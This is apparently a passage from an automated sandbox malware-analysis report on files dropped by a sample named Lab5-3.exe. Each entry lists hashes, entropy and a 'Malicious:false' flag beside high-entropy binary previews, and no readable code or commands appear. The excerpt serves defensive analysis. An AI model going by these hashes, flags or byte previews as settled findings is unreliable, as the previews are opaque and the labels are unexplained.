                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:k3zmu69ww+Jc5XqgkwHfUTid3hBaUoSGFcmeykEdEElU92i:k3yu69wtv3Gx0uKeY2ElUJ
                                                                                                          MD5:1C01B1A6027D19B7404F4ACEB2C8E287
                                                                                                          SHA1:669BB19B9330172B760F0033B854BBD1C5CEF0BA
                                                                                                          SHA-256:74D2946F3FC3783D01946F8E6AA6A8AEB113868423E78D5DA5D1094B653184FA
                                                                                                          SHA-512:E76DAF9773F55527E79F6D25DE072A0746E2D1A5C5B0D288E8D70C56322D1344BF4965345F80DC45AB07326C1D540BEBA574977403506A491E9BB1CB8C0EE212
                                                                                                          Malicious:false
                                                                                                          Preview:r3EI.&.p.B...2..(2.....#k......|w....=...[..iZ..F7...,.CxL..S.v.......B.....Y..7p{.@..[v..*...S..#....a.....8| p..6S..1.....v...d-G4...K...m..$.T...9...`'..E.7...>.5..........T....^.....X6......}..o..Q.o.}..Z:....Qj...V.....gT..g..J.t.....D..@.c.h.9r.....K.....Y..%.W.R.:..T.94/..tV..$y......P.U?.=..D.hi..p......xx.*.c...b..$.Gs.......(...F.t..+.?... w&`..QQ.w. ..U.(oW5.F.f..G.%...l.4........{..?T....P.T.....<..Y...(i..@0..]......6...R......4.S*H..0m...h.^|..x..B.x.N..*..)..6..;.,.y....+.......Quf.i...u[.D.....#V.a..],o.XN.n+.iM.._O..:P>.Sf....kg.-[.?<J.D/....(R.>N...Z.<xg;L.[....iJ.`.!..a.....}..ze.w..0.7y..9..3..p...o.6.eS..I.....Aa_..*......I.Y.y...e.%...vX...AI.M..Y...r?.....^B..a02U....2(..^..5.c2...G...]....S..^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2064
                                                                                                          Entropy (8bit):7.915499160191828
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:UL89hdK1xwGGpWD4HfUTid3hBaUoSGFcmeykEdEElU92i:UEhkrtdfGx0uKeY2ElUJ
                                                                                                          MD5:1EFFA19E3F1BAA1CFCFCAC4EE4BF4634
                                                                                                          SHA1:9EB3525C255D300CB8E077042B686C6EA8D4AEF9
                                                                                                          SHA-256:CB0B657B073BCFDA9E91A76710BE3AEE1E346D8163EF8A919768D5EBE2C9C51E
                                                                                                          SHA-512:3B28E6635FC6E418A830F5C4C80D1ECA8C8E955030252925B46BA5584648C9B17C0592D2F4AE1773DDD370AA4071ABB4D6A6318EC1E86DA8C1F83445B3C51E25
                                                                                                          Malicious:false
                                                                                                          Preview:.........?...J.4H.#.......5CF... ......D..X`C?x...X..{J..dL..C....{i.o.7..E.nW..V...m.&7..R..0.B5T..g....)...L6....X.I.....$E....~......V..#.....qt..p....;$..C.Uh...Q..g..ZhLI..5...a.....8v.nj..t..t...k.N.C.A..U.,.H...I.=.S.0..^'K.+..Q..}1^.c....,Vd..c.0...........`.,d)....d.r.OLK.$..?.D...e:.V..P.,R.c[......V.Z...BXZ~.MPn.....=..K<.........n.d.4...5..Zw..X..:6...6jto0b}bif?.m.`...r..j=..p.'v....t.5.....7 .lkg</YCz.C.d..R/V.y.g..Qt..u..2.........|{=s4>.p[2...J.'Ci..r..0...._bV..R..m1.z...r%.....{j.$... .......r.e*.._...._G.P.dSgj.E..T..PB4....#vN..t%.V......c...!9.s.).?...q{..nk...J.U....2>....I.....WiG.L...K1@Y.{~..<..9d$..B.9...5.....:.m1.d.............A.;..5.....&.u.4.............*.#...l...."D._.s.h...w.........^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2064
                                                                                                          Entropy (8bit):7.918236812769495
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:VReZyI2n+9DxWUZfmHfUTid3hBaUoSGFcmeykEdEElU92i:bIlBl5Gx0uKeY2ElUJ
                                                                                                          MD5:2D8BF69611AE57DEE098BEF2276F7BB0
                                                                                                          SHA1:77B4A2A4A68E1ACFCD0A0C4AD64E07D493439145
                                                                                                          SHA-256:A01011DEADDA27C1DE3A633516C0AAEA0147FE6C7E691DB6B06170EF7D828823
                                                                                                          SHA-512:0B7FCB02620FD6FCE7383EE41F8F87BD5AFE062C5DFA5483F3A1497388BEBEB8802FC319F4A532C7CDB5FB63298D28DB601708658A6E54CD6C948EA6DFD20E09
                                                                                                          Malicious:false
                                                                                                          Preview:s...\A}....gFaU/.E....:co. ....?T....Z$....p............>..h...'.)q.....K.....X..............;..:.w.7a..,.>D2..CE.S.$.\.@.8.^i......9...4.}....ja..v...{......MRU....1...P?.^\.......t0R.A2..5....E.D$ab..I .LV.'....4:v..*.q......A.Ku...*S%...sg.a_9.$.2..{sL&.G..R.1V.s.!.^.W..sM...6W._.........;....T..2..U1t....V.%).....hE....W.......%z{.Db......6.9...FdR..k.r...~..G...D...0..^.R..x...V15.lC%Q..4.A.. ..Qy..cm...w.,...a5...2F...)...e.N...V4......s4.9.d.l..nM.(6...>..#Gw..(...^....*...!......t.l.....p*...EP0..v...a_..Y2xmf.J0.........$...Hu.....Nt..:L..X...Zl%e...b.H...._....$x..w..K..!...e......#r...-).._Y.E.5M.......q..S.......-.|..oV_.gJ..l3(..E..g......I..E...a...........8}w.$_w@....*iP.TeGjC*p....wY1u...T...E.U:.u.....^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:OpenPGP Public Key
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2064
                                                                                                          Entropy (8bit):7.916364682597289
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:KLp/gXL2GnJE1HfUTid3hBaUoSGFcmeykEdEElU92i:yNKLlnNGx0uKeY2ElUJ
                                                                                                          MD5:D0DB9ED4B84AB0615CF9E4A13CDB90B1
                                                                                                          SHA1:2526EABF8D1E6244A869EA89C6DB32A82BCFB11C
                                                                                                          SHA-256:3EF1323E7F715AFF7F6733C02AC5AD2D8F70C2590FC18E74D44A1B3906A6FBA5
                                                                                                          SHA-512:202753378758D5813CF10C5F9836E258F927FB0D90B5ECA3EEF32071AE7544EBAB59CF0A835CABD1D08C4539E364DA8484F41FE00BD86D66FC6682A05D6C73CF
                                                                                                          Malicious:false
                                                                                                          Preview:.h,<.m...WG..S....-q ...h.....L......<.2...S...r3..Z.7.dT4h.R..S,..a\G....*...u.p.......^r.~.....G..Z.mSQ.#c....G.5.w)E....b.r7S.,.1t....4.R.U. ....<eZb.\.v..,.D9.oD.....LltG..t.g....2.{.Z...._k).8...9....lpw...h..}r.b.E.....y...?....}...@l..|8U.......n..V.#........T.JW.F...Z....KJ...5.l.(.N.z..a. ....~.....).....a1.,....!a.f.%[.....>..S=..<@.....J..|.X......e8.J.2nfq(4..?.LY../G..5C....Z/...#[.............U..4.6.o....vS....."fO[....<...;:-..H#...f..N.r...1......DY.].Ar.]..... ...n.c.+)....Q(....b...8.m.W.~F.9..A..`...-.(.......r...........V.....<...8..he..J...d.r+...<...............(..>|/..6XoMN..I./.g.6...g....v..U>2.{...?.I:m....L%*4w.C..>9.;..xt-Gw.7. ....X......E.S.-`...Au.Q..2..|Ff...O..#.BQ......\uk..\...g(\@..i..u..^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2064
                                                                                                          Entropy (8bit):7.905453971562678
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:o155ZOftgwQhdHhUHfUTid3hBaUoSGFcmeykEdEElU92i:o15iVgwQlTGx0uKeY2ElUJ
                                                                                                          MD5:59C08AB526DB6B33EC320BE210A05077
                                                                                                          SHA1:18BF92578B9FCC700074D1E9054AF9014AA40396
                                                                                                          SHA-256:6B3A9AAE3AA98893A7B2F8B9837FE197E2DF4CB4B2F93226834A290AE1287CDD
                                                                                                          SHA-512:820741D7BEF7E90ADF8A68009F0DF70C06C090CEC1732CCD4840FE2A86CADBFF0933D444055A9BB5B09CFBB0B972D95858EAF01CF7703792059BF270CC70FD21
                                                                                                          Malicious:false
                                                                                                          Preview:#..V..F8T......CP......Y...N...Y3.u...D.l.3$.......N.Z...){.../.v....:......0...r..c.S...8.o<..l.c...r....g..2..................i.(.Qo...).u.=.p-.f.H!...b_..jI.=p.S,~.1..@...,..d+.2...,.\P.o...e.B......@........P23...~4.<d..0kt.9.!.v...D..&).J\y.7H...2*.L."........0RRQf.....}6..[..4<N...m.-.$>r.u.me..].k.......[.......K..Y.~...ib. .&.z;"%.?B.....<..m..^+.$.....I.P:........Y3j..f...._......{...d....SUi.E..<.Ho.#57...e.$.u..X4.`.X.rB..;...'&@..J8..!..3.5.4o....,.....#U.9.F.B._J..... ......i.%T.(.F....:..;._Hj.M.k[.W..9......Zh`...!..V.x..-..P..#Qr.....O.5.|.Cq^U.A...m..:..!S.~...2@..%.L.P......%....P2O.T..V..L.<.}7.....O.G...~..;...e.......2?.$..R.....m...F.H......0.U.. ..G..Q.P4r.Jd.`...kD....D@..%....B;U..]g_S..z..^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2064
                                                                                                          Entropy (8bit):7.908204618080829
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:tb5eLHU5HW9s3Ppi+TVAnCHfUTid3hBaUoSGFcmeykEdEElU92i:Y09sGx0uKeY2ElUJ
                                                                                                          MD5:41E89AD4B82DF5FBDF184C6BB9E7142A
                                                                                                          SHA1:4C6D85AEB7B12C6C7A5898EBF30BB98544EA4980
                                                                                                          SHA-256:8163CA887F2E260375A916996F7B09BDD8D06BA3E441B66C2A4A2B7D97CB0FE2
                                                                                                          SHA-512:6EF17E0791504987D14FD5F6751018AE02CE20423DB8ECF66A109734181E43453A89D0B6B297D927B85A6E237C2BB584B22BF9E59D462AA3A26F87C7860A60D2
                                                                                                          Malicious:false
                                                                                                          Preview:...../J.Xg:K.r.a,`f.F3.#..Q.}nm...@.Q..Q2.B.g.y%.l8.(.A .%i...c#TY...%F..4.7..l..'>.....G......$x[q.....^#.]........a>/...].h..7..<l.q.E`..s....^........L`^._g....?G8..|..z+.%.n..K.u....RK..}c..1.vb!.<.${...T;.....j-3.l......M=..{'>.a-..!{Tg.Xv2...c.....r<.=n.E[.1...*.0x{......H..@.a.Y.....[.}...$...~$;.9_....j...:.;.f t.3.0}QE.>.7....O..@#q.l..e@..m.,..M.O..Oe0y.T...;...3ti.........H./.9..N.^D.4m.;..1G.J............l.:.... ....Q.C....:.v...3........W;..%...Kf...i...-]....t......:.m6....]#?Z.l\....<]......nK..a}....8.B.D...!@..(H...0u..l.G....JV..(.L0.R%...x.K?/...F'.D...|.gYI..V.1.....=..jK.E}......*......O..k...m....5.)[.."z..lJ].0.)..T.kabqi.D...).&.q=.v.q=Ch:RsR.../..Q.. ..A..j.Y>!(%.i....a...T...h.M...gR.IO8qr..^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2064
                                                                                                          Entropy (8bit):7.9075631021871144
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:LK9YSPwpAgeiXV8uHfUTid3hBaUoSGFcmeykEdEElU92i:LoYKKAgXXUGx0uKeY2ElUJ
                                                                                                          MD5:667FC8AE61308E52BAACC983AB223579
                                                                                                          SHA1:5AF532D521F0B2ADE7379D08613CA6E1C4716957
                                                                                                          SHA-256:8387BCB18872D7F2F2EA85AD8370D57A65B97AB67F08D42DEE549E75767F6F1B
                                                                                                          SHA-512:5DF5BB7C5B513A5006BCE120077AE40E62AB01B0A28455E0C64803B64C1524D3448953E0533053BEE359D07919EFACB3AB191B404144ADD38C554D207C9C3F14
                                                                                                          Malicious:false
                                                                                                          Preview:..m....-;.=...PUP.:r.P...VGgZIq.y.R.....Z..]8N.p.:..f...L.N!.!|..N......(1.y.k...p Mp....(..FO6.8../p...G.2.S........1...g.WW..c.Y.}...!...;..9......v.z.z.9'j..../X....f.N.>...+.#c.....W....d[...5A...-dy...p.L....f..8...S...~........UHx'.5.....}N,.u.......3.P<.%M..B.Y.o.b.S.%xt.U...>...I)...,.H.I..0.v../.,.......=...^..$..YK.x..B.<...>@..W%.....x.T1|.F.d...$02..B.s...d..fX...[.>@G.9..f.2..;....9..&.o......3...uo....[.....a...A..r...... .I. ..z.xA...q.].@..7..x...h0bM..RS.@...a.Z.H.wx.<.....F.{.M.H.......&H./x..^4r~.;.5...d\>.+..&... ....Q\....3(Fb...g2.F.r..}.-..C`...#.x.....k.:.j8.i...Lu..M.}.>.C$}.....<.>.ya{..-}. ......UQw^C^.-..~..]..........p.).@...0.]f#...M....i'.....^I@Hc....c...... W.")4.1=....u.._.S.....k...BC1(..^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2064
                                                                                                          Entropy (8bit):7.910698837522985
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:ZxCqgtzimic2HfUTid3hBaUoSGFcmeykEdEElU92i:ZEqSzifEGx0uKeY2ElUJ
                                                                                                          MD5:CCAAFFFF7F8E6216C7195F96C6CDAB21
                                                                                                          SHA1:0BD0662F4549BDE413888B198E6FA2FD7E66950C
                                                                                                          SHA-256:E1E003B257BE7E41023C6E392FD27EF36AB95A88F67635AA4F49966E02751F8B
                                                                                                          SHA-512:915BC2350AD9DFAE7DAAF78FCEAA062E4A5BD106CDE10D77EE929584B077609B4FE917EF99A39448E27CD1A8AA7AC5B6394E6C3634B4DE74DC9DB93A5DA48F3D
                                                                                                          Malicious:false
                                                                                                          Preview:/:.@.@.P...B..%[W|&.2...bY.m.p....y.CD...J.!.Jr....`7.X.....O..X.d.N....+Ce@...F..G.4..l.....'P.U.E......*FU>Rg..G...Zp..W....Sem.jk.Y.\...{.....@%.*..=....l..MG.4..j...*.K...P.M..\}a..2.$@.......iKRX..R.G..c(..3G.......n..#...U.6.Q..Gfw{..Z.e....9.."-.ZV...R..x]tS.O.^.8.Y.8.#..c...t.......'..&....Ac...5:..E..h.......*...*.7...p..........J..Z.]..p.W...Qrl...x.]a...e.&..._#..T..K>.....Z)...{9@d...-U..5g......{I.F.CK......\.....s..........~`'-.xDd..2.A.a}.g....Ac.......s...@...0........D3.k..s......v.....%.s.k...3.72.......F9.}...".G..W.m....v...m9.M...S...r..#..>..a...UJq..Hd.[.Q..v...+.%.R..)..b/u.G..[S..z.!... ..+.Qf.6f#..wt.~..T.H.2..csj9.....g(......h...L.....2."...,.._.*.=.B.y..D...|3....;.R~..... ..# w..[..^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2064
                                                                                                          Entropy (8bit):7.913600061516754
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:zmTF4rtjAn+brWmHfUTid3hBaUoSGFcmeykEdEElU92i:iTSwGx0uKeY2ElUJ
                                                                                                          MD5:93F02F88D972BE02F15E3937A3A1AC49
                                                                                                          SHA1:E2A8B163D3F1E4D3EDF92B48C8FB324CB4CDD885
                                                                                                          SHA-256:F293EDAF165A0A161D956EFDF1502FD84C15033C98895F8E628B0D7F9412F414
                                                                                                          SHA-512:40FEF4073431D9B73CF056F301BF09FD8F0CE6F64A08D25973C55628FB0E99D28A370D741358ABB29F1F649651E9E9CF32B05FAC1FA1982A840AEA9B606FA768
                                                                                                          Malicious:false
                                                                                                          Preview:Hn.^..OmjI..".qU.<.z..r,y.v.?D}...*|).>.t.'y.f'uD.. <.1..n....V$...a_..|6.b..........[.9`F.....iVc^...a,k...........-...4.4pU..7..x..14y../..1.........Y......_K.lE..p......yO1.A........,h..e...a.....9.....F.C..|..,.M..H.~R...Y...!.Y.....Q@.[.=.w.p&KjKs..o..4.'?.L].Z...O. p....s;We.....q5^+....H..&.Q.....A.U.r..N....U:.s.h>..J+..R.0...(...1...Bh{)....ld..A.)..m....u...y...7.....a&d.......!jE.b..P.qe.oRQ....T...@S....@.........iY.Z.A...e.'....-jo.3..c}"M.7..{7y.... .=w.W.......%......H....R...{r.m.Q.u=.........9.}*...?..:.@..L./8...}i..vE.M.j=4...P..#fK.%.MP.Zw...~..?]}.AK..........6........H.-J:....>.s..7...gd..'~g......e....C.6.,..4y.o7....t.).r.C..c.#..%T.^..+.>..2.......bH...olNC../z......M..b.x.)I.t..r...q......r<.o.... V.l..^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2064
                                                                                                          Entropy (8bit):7.919390664886471
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:8Ze52wRpML+8UF3HfUTid3hBaUoSGFcmeykEdEElU92i:MW2ipM3Gx0uKeY2ElUJ
                                                                                                          MD5:C912EB9BFB9CBF0D5F23481925F07657
                                                                                                          SHA1:3E560829D7CBAB5FE27D2C65159F0D7BF4CF2A5C
                                                                                                          SHA-256:8FA1AB5E1D7834461CF1DA5B7D2DA8CE382390F63168024DAEE34D84AD421E53
                                                                                                          SHA-512:9970C8F5A18B6E063A664070F4C61B0861488B66A7A5FECB89E4D94D10F6F70EC00045EC100A2B41D84E3FE977886F024D972BBE86041CAB18DE1F1FBB8C734F
                                                                                                          Malicious:false
                                                                                                          Preview:..%..P..dx0.Q.....7..p..6B...8.Y..g..>..}...q'.\U@Z.....-K..a..[Y...b6....O..q..@..u...RZ.l...U....{.<> s...C... Y.\.a.8.....u..5.r^].&H.NM.{..@w........../.._b.q*..}...,E..{`.>.....~.C....x8.B_8.-.....A%.u...F..f..#.g.].<x..n...L.......rJ3rp.w.[...2c...$2Wh.B&..V....fv#.E.:x......[.,S2.M[..o.LDz.m.p7P+..w.l.M...........w.....i.5ol.$.k.8.....L..y..D.....#....|.g...W.j.........7...P.^......"L.o.&.C.a.3$t...K=}.<%u...H.....N'..V...M.....A.\e6.g.?.u..p...?..t^......J.,.^....G.vK.....nH.C]....g...d..........P.M..n.W.....-...{A.. ......)........1...'......}N.CN....P..(.A.R....}...B4.............s..#.d..)H....h,L.7.ZXG1.+%...(..^z.F..%......:..e...o.?.....i..|....R..!.*q....B..>P..R.....(....rpT.U p.}z..{\.-.j..;. .ZF. ..4.......^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2064
                                                                                                          Entropy (8bit):7.918245179978585
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:qWXH1Z+kDY4qllu1HfUTid3hBaUoSGFcmeykEdEElU92i:qsHv+Jl3Gx0uKeY2ElUJ
                                                                                                          MD5:EB2C1EAA8FC72D1B4DC3E2B403241DDD
                                                                                                          SHA1:D06631159496DA376620A8F9283895F482833E86
                                                                                                          SHA-256:54A051B306642BF09B7A78EDEFB140E767F3EC404D89E84AC1700B7A18146161
                                                                                                          SHA-512:385DF52315DFCF61B490FA7B721E822BF41B75FDF1FDA86462D8BE7E934913EA7E2300E03462B43211FC3E02D39EC6A220D043EB78952AF85A6051ECC677026A
                                                                                                          Malicious:false
                                                                                                          Preview:.........D/.@.P.Q....V..,/...qn..q(|G.....35...2..i..g.p..gl@..@M.....1...X.W4...M.....P.x.S...k&..*.<y.....Z.gW..a.......J+*.@.(.c.)l:.~.&..#H.B.....H..<N\+.*ot:...[.........b....4,.........hq^x.@.w.....q.*/.o..c..Ycb[~i.....n]..hadX6Y...[|e$.A..T.w..8.....;J...:..%+..8.z...OE.......!R....-.D.K.."C;.Z{.]...'.I..w.e.{.7Y..!.%|`@..?Q....F=...F.S..Z.N......L....5.0.d;L-I.$}....X!.FN.b!\3Yt.ax...NI.To.4..I..g.. ..._ug../.b"...Z........&....^n...%....X..@".y....c.....G\..8..HS...n.:=.B.\...Z.I.M!Z.Z.H..*n0vh..^........CB..(r..R......2It....\....U.."....>....].r.O.7.a..$. .VP.'(..~..].x..`..J.i6A.......3....,.b.....:O.eX..X..m.).... .U.....&@4\.@9..[..L.WCh........H..2."_.....kZ2.......p...;XF.An....S.M...i..?......%9.;...^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2064
                                                                                                          Entropy (8bit):7.9128290545436455
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:uwFamloUjJmw3CCjSFHfUTid3hBaUoSGFcmeykEdEElU92i:loUjJxfSeGx0uKeY2ElUJ
                                                                                                          MD5:9DDCF0D94A390D3CD9BC2B6D2E3CCE6D
                                                                                                          SHA1:508CE138C58B336A2112B74229B68AFA31380C1D
                                                                                                          SHA-256:1A139D912A6B2EA8A32541CA662FA7483ED903C4B07DEFBCBB3623F7E8ED4C50
                                                                                                          SHA-512:787AD714D82F1695133AA26631C36564ED6EEB17E583357439205390773A84E1F6CC0722A5565BDEA703834013626890F16B271D472901637678C8BB13118590
                                                                                                          Malicious:false
                                                                                                          Preview:a...)i..*.q..I.!.............W-..{..wH..+.[U.;.F6BX{#-..O....>lFkXw....aY.....Gp...y....a..f...w....X.........z..q~.....7..E.B.c/.u$l..4...u.&).(.s...<d....Lfg...........>.$.-...!.S..*-aE...xx..|j.........i..g...V.v.EE4R...QN./.Y{.UV.._<.S*;.?.;G..%E.A7..........#/.(....D#..;.....5...u|z.Jq=........!.`(...H ..Qy..B..;+.>z..t..H.K#q..=..`E...@.E_.3..-.#..t.l.1k..&......v....f.S..K..>..WwR...[~.h.y.M;l.6.:....[.U}.....g...!.i.1....l.n!..w.)cql4;nM.&..K.....IG.M?....a6...|......)S..+2....:.'^&..+o}.NW.....(Ty.n.J.n...F..9.............x...1..@.q.K..!.....H..=..#{t........l....\.Ve..i..B..N.......\RF..J....._k..{.).....W....)J..m.:Hh.b.&n:..R.........A&.u.`..M....Tj....q........R.RE..1.G.}V.(..).......hv.D.D...1L.Z......C.]..^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2064
                                                                                                          Entropy (8bit):7.915581785373411
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:0jP2uSpyfEAh9Mjulmm7JmnQHfUTid3hBaUoSGFcmeykEdEElU92i:0jPlMZwSK57JmXGx0uKeY2ElUJ
                                                                                                          MD5:AE7F70AFA61D32DBC67D7934A7B7C4F6
                                                                                                          SHA1:3460F07D8F35AD0336984BF117601ADEAF86C9E6
                                                                                                          SHA-256:D0DD4F6F69E817B62EAE7CC79FC6DAA5E6154416AEC9AB7CBAD2E997E68B2934
                                                                                                          SHA-512:0E578254B93E0EA241A144D5B116614E81F99EFA823CDB20E393F2484BEF0DAEFB1FB6474A64D4ED88E860902B9B4D875D02290C7E593846FFDB63B4F7EF11F4
                                                                                                          Malicious:false
                                                                                                          Preview:F...}...:iNh........l....Q{.U...f.@.,......p.x.#5..64C.5Q.....SET..~...>..%.q......b........<Q..z..q6.F..w.{...L. .A..o.xp.D..t:....%{D6..:..u.w..l...u.h..-%D..s=...Bh.....l...].:b..g:IK......Q..7..z...L......R..x...I....9..t.&..6L4t....*0_Jr...Qm.V...B...[.A.+6..qJ8.T|....yUg....-%....eQ#B...yH.C).F.........Z....J^da.#.f...t..*.B....Lg....7.<D..o12..'0..k:...c..CF..q....|q@+~..Y.[8.-.'@.T.]aB....6..`".+..#.......o....8..G.#.R.,v)..I..E.U"@.x..{4.6.^..45...34...7...".Ny...2..........G.:E7Z_7..L...PR$..@..8.=q4I........:....'.u>`...`.....!..+7..W.)..../\.-)...nr...Yr.....a.QP-..5".b$.-...VCB.KrH..[AF.y.,@. -.A;..2.D.<........D.._......\...g..%.J..w...x,W...Q.&.<..`.....!...Fr....vL....F..oZN_..S.*._..`3.4..w.D.>i.].._~..^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2064
                                                                                                          Entropy (8bit):7.907585882605101
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:6s+Nu0w8ONm5YQJHfUTid3hBaUoSGFcmeykEdEElU92i:6sqjJ5JKGx0uKeY2ElUJ
                                                                                                          MD5:5713140C6BE4D5AAC001C205A554D65C
                                                                                                          SHA1:7A3D6B95F0959F0165F7423C04224D1F6B826C0A
                                                                                                          SHA-256:CD44BC915BD3F4B7D2EA7919F399C14493581E4E066B03F361CB175EF4F096F3
                                                                                                          SHA-512:3E92D5EE6EB5F0F370FBE612CF10BD407F7FA9D6B0D939B82F0AA22C003B4CECBF5B47E4ECF0A86A44B099057D450EE30F6AC0B200F1A851DA8FFD27879D5376
                                                                                                          Malicious:false
